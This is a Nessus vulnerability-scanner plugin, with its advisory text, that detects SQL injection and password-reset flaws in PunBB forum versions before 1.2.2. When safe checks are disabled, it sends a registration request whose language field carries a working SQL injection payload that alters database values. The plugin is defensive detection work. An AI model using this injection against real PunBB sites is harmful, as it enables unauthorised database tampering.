PunBB < 1.2.2 Multiple Input Validation Vulnerabilities

2005-02-26T00:00:00
ID PUNBB_INPUT_VALIDATION_VULNS.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks.

In addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(17224);
  script_version("1.22");

  script_cve_id("CVE-2005-0569", "CVE-2005-0570", "CVE-2005-0571");
  script_bugtraq_id(12652);

  script_name(english:"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of PunBB that fails to properly
sanitize user-input to several scripts thereby enabling an attacker to
launch various SQL injection attacks.  

In addition, the profile.php script enables anyone to call the
change_pass action while specifying the id of an existing user to set
their password to NULL, effectively shutting them out of the system." );
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110927754230666&w=2" );
 script_set_attribute(attribute:"see_also", value:"http://forums.punbb.org/viewtopic.php?id=6460" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to PunBB 1.2.2 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/26");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/24");
 script_cvs_date("Date: 2018/11/15 20:50:18");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
  summary["english"] = "Detects input validation vulnerabilities in PunBB";
  script_summary(english:summary["english"]);
 
  script_category(ACT_MIXED_ATTACK);
 
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_family(english:"CGI abuses");

  script_dependencie("punBB_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/punBB");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/punBB"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  ver = matches[1];
  dir = matches[2];

  # If safe_checks are enabled, rely on the version number alone.
  if (safe_checks()) {
    if (
      # Either the version is 1.1.x - 1.2.1 or
      ereg(pattern:"^1\.(1|2$|2\.1([^0-9]|$))", string:ver) ||
      # the version is unknown and report paranoia is Paranoid.
      ("unknown" >< ver && report_paranoia == 2)
    ) {
      security_hole(port);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
  # Otherwise, try to exploit it.
  else {
    # Specify a user / password to register. gettimeofday() serves
    # to avoid conflicts and have a (somewhat) random password.
    now = split(gettimeofday(), sep:".", keep:0);
    user = string("nessus", now[0]);
    pass = now[1];

    # Try to create a new user.
    url = "/register.php?action=register";
    bound = "bound";
    boundary = string("--", bound);
    postdata = string(
      boundary, "\r\n", 
      'Content-Disposition: form-data; name="form_sent"', "\r\n",
      "\r\n",
      "1\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_username"', "\r\n",
      "\r\n",
      user, "\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_password1"', "\r\n",
      "\r\n",
      "whatever\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_password2"', "\r\n",
      "\r\n",
      "whatever\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="req_email1"', "\r\n",
      "\r\n",
      user, "@example.com\r\n",

      boundary, "\r\n", 
      'Content-Disposition: form-data; name="language"', "\r\n",
      "\r\n",
      # nb: we're supplying values for language, style, registered, 
      #     registration_ip, and last_visit. A value of 0 for
      #     'registered' implies the user registered in 12/31/1969,
      #     which is the basis for our check below.
      "English','Oxygen',0,'0.0.0.0',0) -- \r\n",

      boundary, "--", "\r\n"
    );

    r = http_send_recv3(method: "POST",  item: dir + url, port: port,
      content_type: "multipart/form-data; boundary="+bound );
    if (isnull(r)) exit(0, "The web server did not answer");
    res = r[2];

    # Now check the User List for the user we just created.
    r = http_send_recv3(method:"GET", port:port,
      item:string(dir, "/userlist.php?username=", user, "&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit") );
    if (isnull(r)) exit(0);
    res = r[2];

    # If they registered in 1969, there's a problem.
    if (egrep(pattern:'class="tcr">.*1969.*</td>', string:res)) {
      rep  = string(
        "**** Nessus has successfully exploited this vulnerability by registering\n",
        "**** the user ", user, " to PunBB on the remote host;\n",
        "**** you may wish to remove it at your convenience.\n"
      );
      security_hole(port:port, extra: rep);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
}